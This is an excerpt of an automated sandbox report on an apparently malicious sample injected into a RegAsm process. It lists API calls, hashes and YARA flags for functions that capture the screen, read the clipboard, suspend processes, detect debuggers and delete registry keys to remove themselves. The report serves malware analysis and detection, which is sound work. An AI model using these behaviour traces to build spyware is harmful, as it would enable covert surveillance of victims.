                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$CloseDataOpen
                                                • String ID:
                                                • API String ID: 2058664381-0
                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandleOpenResume
                                                • String ID:
                                                • API String ID: 3614150671-0
                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandleOpenSuspend
                                                • String ID:
                                                • API String ID: 1999457699-0
                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID: MZ@
                                                • API String ID: 2325560087-2978689999
                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: JD
                                                • API String ID: 1084509184-2669065882
                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 1661935332-0
                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                • GetIconInfo.USER32 ref: 00418FF8
                                                • DeleteObject.GDI32(?), ref: 00419027
                                                • DeleteObject.GDI32(?), ref: 00419034
                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                • DeleteDC.GDI32(?), ref: 00419293
                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                • String ID: DISPLAY
                                                • API String ID: 4256916514-865373369
                                                • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
